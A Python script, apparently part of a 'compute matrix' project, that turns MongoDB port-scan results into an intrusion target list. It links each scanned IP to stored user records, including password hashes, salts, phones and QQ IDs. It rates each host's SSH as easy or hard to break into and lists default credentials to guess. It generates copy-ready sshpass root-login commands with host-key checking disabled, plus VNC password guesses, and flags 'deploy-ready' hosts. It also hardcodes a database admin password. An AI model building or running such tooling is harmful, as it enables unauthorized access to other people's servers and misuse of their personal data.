suanli-juzhen/01_扫描模块/scripts/enhance_scan_table.py

#!/usr/bin/env python3
"""
增强 KR.分布式矩阵IP_已扫描 表
================================
从 MongoDB 中已导入的基础扫描数据出发，增强为完整文档：
- 关联用户链（从分布式矩阵IP源表）
- SSH 难易度评估
- 登录建议（SSH/RDP/VNC/Telnet/Web 命令）
- 部署评估
- 快捷登录命令

直接操作 MongoDB，不需要加载 298MB JSON。
"""

import pymongo
import sys
from datetime import datetime
from collections import defaultdict

MONGO_URI = 'mongodb://admin:admin123@localhost:27017/?authSource=admin'

# SSH 难易度标签
DIFFICULTY_LABELS = {
    1: "极易(默认密码/老设备/Telnet)",
    2: "较易(弱密码/嵌入式/VNC)",
    3: "中等(标准服务器)",
    4: "较难(新版本SSH/密钥优先)",
    5: "极难(仅密钥认证/防火墙)",
}

# 常见默认凭证
DEFAULT_CREDS = {
    "Linux/BSD": [
        ("root", "root"), ("root", "admin"), ("root", "123456"),
        ("root", "password"), ("admin", "admin"), ("ubuntu", "ubuntu"),
    ],
    "Ubuntu Linux": [("ubuntu", "ubuntu"), ("root", "root"), ("root", "admin123")],
    "Debian Linux": [("root", "root"), ("root", "admin")],
    "CentOS/RHEL": [("root", "root"), ("centos", "centos"), ("root", "admin123")],
    "Windows": [("Administrator", "admin123"), ("Administrator", "123456"), ("admin", "admin")],
    "嵌入式/路由器": [("admin", "admin"), ("root", "admin"), ("root", "root")],
    "MikroTik路由器": [("admin", ""), ("admin", "admin")],
    "Unknown": [("root", "root"), ("admin", "admin"), ("root", "123456")],
}

SSH_SIGNATURES = {
    "OpenSSH": "Linux/BSD", "dropbear": "嵌入式/路由器",
    "ROSSSH": "MikroTik路由器", "Cisco": "Cisco设备",
    "libssh": "自定义SSH", "WeOnlyDo": "Windows SSH",
    "SSH-2.0-Go": "Go应用",
}


def assess_ssh(banner, open_ports_set):
    """评估SSH难度"""
    if not banner:
        return 5, "极难(无SSH banner)", []
    difficulty = 3
    notes = []
    bl = banner.lower()
    
    if any(v in bl for v in ["openssh_4.", "openssh_5.", "ssh-2.0-openssh_4", "ssh-2.0-openssh_5"]):
        difficulty -= 1; notes.append("老版本SSH")
    elif any(v in bl for v in ["openssh_8.", "openssh_9.", "ssh-2.0-openssh_8", "ssh-2.0-openssh_9"]):
        difficulty += 1; notes.append("新版本SSH(安全性高)")
    if "dropbear" in bl:
        difficulty -= 1; notes.append("嵌入式设备(可能默认密码)")
    if any(v in bl for v in ["cisco", "rosssh"]):
        difficulty -= 1; notes.append("网络设备(可能默认凭证)")
    if 5900 in open_ports_set:
        difficulty -= 1; notes.append("有VNC(通常密码简单)")
    if 23 in open_ports_set:
        difficulty -= 1; notes.append("有Telnet(明文)")
    if 3389 in open_ports_set:
        notes.append("有RDP远程桌面")
    if 8888 in open_ports_set:
        notes.append("有宝塔面板")
    
    difficulty = max(1, min(5, difficulty))
    return difficulty, DIFFICULTY_LABELS.get(difficulty, ""), notes


def guess_os(banner):
    """从SSH banner推测OS"""
    if not banner:
        return "Unknown"
    bl = banner.lower()
    for sig, os_type in SSH_SIGNATURES.items():
        if sig.lower() in bl:
            if "ubuntu" in bl: return "Ubuntu Linux"
            if "debian" in bl: return "Debian Linux"
            if any(v in bl for v in ["centos", "el7", "el8"]): return "CentOS/RHEL"
            return os_type
    if "ubuntu" in bl: return "Ubuntu Linux"
    if "debian" in bl: return "Debian Linux"
    if any(v in bl for v in ["centos", "el7", "el8"]): return "CentOS/RHEL"
    if "openssh" in bl: return "Linux/BSD"
    return "Unknown"


def main():
    client = pymongo.MongoClient(MONGO_URI)
    db = client['KR']
    
    # 源表（基础扫描数据，已由 kr_full_scan.py 写入）
    scan_coll = db['分布式矩阵IP_已扫描']
    # 用户链源表
    matrix_coll = db['分布式矩阵IP']
    
    existing_count = scan_coll.count_documents({})
    print(f"分布式矩阵IP_已扫描 现有: {existing_count:,} 条")
    print(f"分布式矩阵IP 源表: {matrix_coll.estimated_document_count():,} 条")
    
    if existing_count == 0:
        print("错误: 目标表为空，请先运行 kr_full_scan.py 进行扫描")
        sys.exit(1)
    
    # ===== 第一步: 构建 IP -> 用户映射的索引 =====
    print("\n[1/4] 构建 IP → 用户索引（从分布式矩阵IP表）...")
    
    # 获取所有已扫描的 IP
    scanned_ips = set()
    for doc in scan_coll.find({}, {"ip": 1}):
        scanned_ips.add(doc["ip"])
    print(f"  已扫描 IP: {len(scanned_ips):,}")
    
    # 构建索引: IP -> 用户列表
    ip_users = defaultdict(list)
    total_matched = 0
    batch_count = 0
    
    # 分批查询（避免超大 $or 查询）
    ip_list = list(scanned_ips)
    batch_size = 500
    
    for i in range(0, len(ip_list), batch_size):
        batch = ip_list[i:i + batch_size]
        query = {"$or": [
            {"ip": {"$in": batch}},
            {"ip_reg": {"$in": batch}},
            {"ip_last": {"$in": batch}},
        ]}
        for user in matrix_coll.find(query, {
            "_id": 0, "username": 1, "email": 1, "password": 1, "salt": 1,
            "phone": 1, "qq": 1, "region": 1, "country": 1, "province": 1, "city": 1,
            "source_db": 1, "source_col": 1, "reg_time": 1, "last_active_time": 1,
            "R_score": 1, "F_score": 1, "M_score": 1, "RFM_total": 1,
            "value_level": 1, "user_type": 1, "extra": 1,
            "ip": 1, "ip_reg": 1, "ip_last": 1,
        }):
            # 关联到所有匹配的 IP
            for field in ["ip", "ip_reg", "ip_last"]:
                ip_val = user.get(field, "")
                if ip_val and ip_val in scanned_ips:
                    ip_users[ip_val].append(user)
                    total_matched += 1
        
        batch_count += 1
        if batch_count % 50 == 0:
            progress = min(i + batch_size, len(ip_list))
            print(f"  索引构建: {progress:,}/{len(ip_list):,} ({progress/len(ip_list)*100:.0f}%) | 匹配用户: {total_matched:,}")
    
    print(f"  索引完成: {len(ip_users):,} 个IP有关联用户, 总匹配: {total_matched:,}")
    
    # ===== 第二步: 增强每条记录 =====
    print(f"\n[2/4] 增强 {existing_count:,} 条记录...")
    
    # 创建新的增强集合
    enhanced_coll_name = "分布式矩阵IP_已扫描_v2"
    enhanced_coll = db[enhanced_coll_name]
    enhanced_coll.delete_many({})
    
    batch_docs = []
    processed = 0
    
    for doc in scan_coll.find():
        ip = doc.get("ip", "")
        open_ports = doc.get("open_ports", {})
        
        # 端口集合（统一为 int）
        port_ints = set()
        for p in open_ports.keys():
            try: port_ints.add(int(p))
            except: pass
        
        # SSH 信息
        ssh_open = 22 in port_ints or 2222 in port_ints
        ssh_port = 22 if 22 in port_ints else (2222 if 2222 in port_ints else None)
        ssh_banner = ""
        if ssh_port:
            ssh_banner = open_ports.get(str(ssh_port), {}).get("banner", "")
        
        os_guess = guess_os(ssh_banner) if ssh_banner else doc.get("os_guess", "Unknown")
        
        # SSH 难度
        diff_val, diff_label, diff_notes = assess_ssh(ssh_banner, port_ints) if ssh_open else (5, "极难(无SSH)", ["SSH端口未开放"])
        diff_stars = "★" * diff_val + "☆" * (5 - diff_val)
        
        # 远程方法
        remote_methods = []
        if ssh_port: remote_methods.append(f"SSH:{ssh_port}")
        if 3389 in port_ints: remote_methods.append("RDP:3389")
        if 5900 in port_ints: remote_methods.append("VNC:5900")
        if 23 in port_ints: remote_methods.append("Telnet:23")
        if 8888 in port_ints: remote_methods.append("BaoTa:8888")
        
        # 用户链
        users = ip_users.get(ip, [])
        users_sorted = sorted(users, key=lambda x: x.get("last_active_time") or "", reverse=True)
        primary = users_sorted[0] if users_sorted else {}
        
        # 用户摘要
        users_summary = []
        for u in users_sorted[:20]:
            users_summary.append({
                "username": u.get("username", ""),
                "email": u.get("email", ""),
                "password_hash": u.get("password", ""),
                "salt": u.get("salt", ""),
                "phone": u.get("phone", ""),
                "qq": u.get("qq", ""),
                "source_col": u.get("source_col", ""),
                "reg_time": u.get("reg_time", ""),
                "last_active": u.get("last_active_time", ""),
                "value_level": u.get("value_level", ""),
                "RFM_total": u.get("RFM_total", 0),
            })
        
        # 登录建议
        login_ssh = None
        if ssh_port:
            creds = [{"u": u, "p": p} for u, p in DEFAULT_CREDS.get(os_guess, DEFAULT_CREDS["Unknown"])]
            # 追加数据库用户凭证
            for u in users_sorted[:5]:
                un = u.get("username", "")
                pw = u.get("password", "")
                if un and len(un) <= 32:
                    creds.append({"u": un, "p": f"hash:{pw[:16]}" if pw else "", "from_db": True})
            login_ssh = {
                "port": ssh_port,
                "cmd": f"ssh root@{ip} -p {ssh_port}",
                "cmd_sshpass": f"sshpass -p 'PASSWORD' ssh -o StrictHostKeyChecking=no root@{ip} -p {ssh_port}",
                "creds": creds,
            }
        
        login_rdp = {"port": 3389, "cmd": f"open rdp://{ip}", "cmd_rdesktop": f"rdesktop {ip}:3389"} if 3389 in port_ints else None
        login_vnc = {"port": 5900, "cmd": f"open vnc://{ip}", "common_pw": ["", "123456", "password"]} if 5900 in port_ints else None
        login_telnet = {"port": 23, "cmd": f"telnet {ip} 23"} if 23 in port_ints else None
        
        web_urls = {}
        if 80 in port_ints: web_urls["http"] = f"http://{ip}"
        if 443 in port_ints: web_urls["https"] = f"https://{ip}"
        if 8888 in port_ints: web_urls["baota"] = f"http://{ip}:8888"
        
        # 部署评分
        deploy_score = 0
        if ssh_open: deploy_score += 50
        if os_guess in ("Ubuntu Linux", "Debian Linux", "CentOS/RHEL", "Linux/BSD"): deploy_score += 30
        elif os_guess == "Unknown" and ssh_open: deploy_score += 15
        if 80 in port_ints or 443 in port_ints: deploy_score += 10
        if 3389 in port_ints: deploy_score -= 10
        
        deploy_notes_parts = []
        if ssh_open: deploy_notes_parts.append("SSH可达")
        if os_guess != "Unknown": deploy_notes_parts.append(f"{os_guess}")
        if 8888 in port_ints: deploy_notes_parts.append("有宝塔面板")
        if 3389 in port_ints: deploy_notes_parts.append("Windows RDP")
        
        # 服务器类型
        server_types = []
        if ssh_open: server_types.append("SSH可达")
        if 3389 in port_ints: server_types.append("Windows Server")
        if 5900 in port_ints: server_types.append("VNC远程桌面")
        if 23 in port_ints: server_types.append("Telnet")
        if 80 in port_ints or 443 in port_ints: server_types.append("Web服务器")
        if 8888 in port_ints: server_types.append("宝塔面板")
        if not server_types: server_types.append("其他服务")
        
        # 构建完整文档
        enhanced_doc = {
            # === 基本标识 ===
            "ip": ip,
            "source_col": doc.get("source_col", ""),
            "sources": list(set(u.get("source_col", "") for u in users)) if users else [doc.get("source_col", "")],
            
            # === 端口扫描 ===
            "scan_time": doc.get("scan_time", ""),
            "port_count": len(port_ints),
            "open_ports": open_ports,
            "open_port_list": sorted(port_ints),
            
            # === 端口快捷标记 ===
            "ssh_open": ssh_open,
            "ssh_port": ssh_port,
            "ssh_banner": ssh_banner,
            "rdp_open": 3389 in port_ints,
            "vnc_open": 5900 in port_ints,
            "telnet_open": 23 in port_ints,
            "http_open": 80 in port_ints,
            "https_open": 443 in port_ints,
            "baota_open": 8888 in port_ints,
            
            # === 服务器分类 ===
            "server_types": server_types,
            "os_guess": os_guess,
            "ssh_version": ssh_banner[:80] if ssh_banner else "",
            
            # === 远程登录分析 ===
            "remote_methods": remote_methods,
            "remote_method_count": len(remote_methods),
            "ssh_difficulty": diff_val,
            "ssh_difficulty_stars": diff_stars,
            "ssh_difficulty_label": diff_label,
            "ssh_notes": diff_notes,
            
            # === 快捷登录命令（核心：直接复制使用）===
            "quick_ssh": f"ssh root@{ip} -p {ssh_port}" if ssh_port else "",
            "quick_rdp": f"open rdp://{ip}" if 3389 in port_ints else "",
            "quick_vnc": f"open vnc://{ip}" if 5900 in port_ints else "",
            "quick_telnet": f"telnet {ip}" if 23 in port_ints else "",
            "quick_web": f"http://{ip}" if 80 in port_ints else (f"https://{ip}" if 443 in port_ints else ""),
            "quick_baota": f"http://{ip}:8888" if 8888 in port_ints else "",
            
            # === 登录凭证建议 ===
            "login_ssh": login_ssh,
            "login_rdp": login_rdp,
            "login_vnc": login_vnc,
            "login_telnet": login_telnet,
            "login_web": web_urls if web_urls else None,
            
            # === 部署评估 ===
            "deploy_score": deploy_score,
            "deploy_ready": deploy_score >= 50,
            "deploy_notes": "; ".join(deploy_notes_parts),
            
            # === 用户链 ===
            "user_count": len(users),
            "users": users_summary,
            "primary_user": {
                "username": primary.get("username", ""),
                "email": primary.get("email", ""),
                "password_hash": primary.get("password", ""),
                "salt": primary.get("salt", ""),
                "phone": primary.get("phone", ""),
                "qq": primary.get("qq", ""),
                "region": primary.get("region", ""),
                "province": primary.get("province", ""),
                "city": primary.get("city", ""),
                "value_level": primary.get("value_level", ""),
                "user_type": primary.get("user_type", ""),
                "source_col": primary.get("source_col", ""),
            } if primary else {},
            
            # === 元数据 ===
            "enhanced_at": datetime.now().isoformat(),
        }
        
        batch_docs.append(enhanced_doc)
        processed += 1
        
        if len(batch_docs) >= 5000:
            enhanced_coll.insert_many(batch_docs, ordered=False)
            print(f"  [{processed/existing_count*100:5.1f}%] {processed:,}/{existing_count:,} | 有用户链: {sum(1 for d in batch_docs if d['user_count'] > 0)}")
            batch_docs = []
    
    if batch_docs:
        enhanced_coll.insert_many(batch_docs, ordered=False)
        print(f"  [100.0%] {processed:,}/{existing_count:,} 全部完成")
    
    # ===== 第三步: 替换原表 =====
    print(f"\n[3/4] 替换原表...")
    # 删除旧表
    db.drop_collection("分布式矩阵IP_已扫描")
    # 重命名新表
    enhanced_coll.rename("分布式矩阵IP_已扫描")
    target = db["分布式矩阵IP_已扫描"]
    print(f"  已替换! 新表: {target.count_documents({}):,} 条")
    
    # ===== 第四步: 创建索引 =====
    print(f"\n[4/4] 创建索引...")
    for idx in [
        [("ip", 1)],
        [("ssh_open", 1)],
        [("rdp_open", 1)],
        [("vnc_open", 1)],
        [("telnet_open", 1)],
        [("baota_open", 1)],
        [("ssh_difficulty", 1)],
        [("deploy_score", -1)],
        [("deploy_ready", 1)],
        [("os_guess", 1)],
        [("user_count", -1)],
        [("port_count", -1)],
        [("source_col", 1)],
        [("ssh_open", 1), ("ssh_difficulty", 1)],
        [("deploy_ready", 1), ("deploy_score", -1)],
        [("ssh_open", 1), ("deploy_score", -1)],
    ]:
        target.create_index(idx)
    print(f"  16 个索引已创建")
    
    # ===== 统计输出 =====
    total = target.count_documents({})
    print(f"\n{'='*60}")
    print(f"KR.分布式矩阵IP_已扫描 增强完成!")
    print(f"{'='*60}")
    print(f"总记录: {total:,}")
    print(f"SSH可达: {target.count_documents({'ssh_open': True}):,}")
    print(f"RDP可达: {target.count_documents({'rdp_open': True}):,}")
    print(f"VNC可达: {target.count_documents({'vnc_open': True}):,}")
    print(f"Telnet:  {target.count_documents({'telnet_open': True}):,}")
    print(f"宝塔面板: {target.count_documents({'baota_open': True}):,}")
    print(f"可部署:  {target.count_documents({'deploy_ready': True}):,}")
    print(f"有用户链: {target.count_documents({'user_count': {'$gt': 0}}):,}")
    
    print(f"\nSSH难度分布:")
    for d in range(1, 6):
        c = target.count_documents({"ssh_open": True, "ssh_difficulty": d})
        print(f"  {d}★ {DIFFICULTY_LABELS.get(d, '')}: {c:,}")
    
    print(f"\nOS分布 (SSH可达):")
    pipe = [
        {"$match": {"ssh_open": True}},
        {"$group": {"_id": "$os_guess", "count": {"$sum": 1}}},
        {"$sort": {"count": -1}}
    ]
    for r in target.aggregate(pipe):
        print(f"  {r['_id']}: {r['count']:,}")
    
    print(f"\n来源分布:")
    pipe = [
        {"$unwind": "$sources"},
        {"$group": {"_id": "$sources", "total": {"$sum": 1}, "ssh": {"$sum": {"$cond": ["$ssh_open", 1, 0]}}}},
        {"$sort": {"total": -1}}
    ]
    for r in target.aggregate(pipe):
        print(f"  {r['_id']}: {r['total']:,} (SSH: {r['ssh']:,})")
    
    # 显示几条样例
    print(f"\n样例 (SSH难度最低前5):")
    for doc in target.find({"ssh_open": True}).sort("ssh_difficulty", 1).limit(5):
        print(f"  {doc['ip']}:{doc.get('ssh_port', 22)} | {doc['os_guess']} | {doc['ssh_difficulty_stars']} | 用户:{doc['user_count']} | {doc.get('quick_ssh', '')}")
    
    print(f"\n完成!")


if __name__ == "__main__":
    main()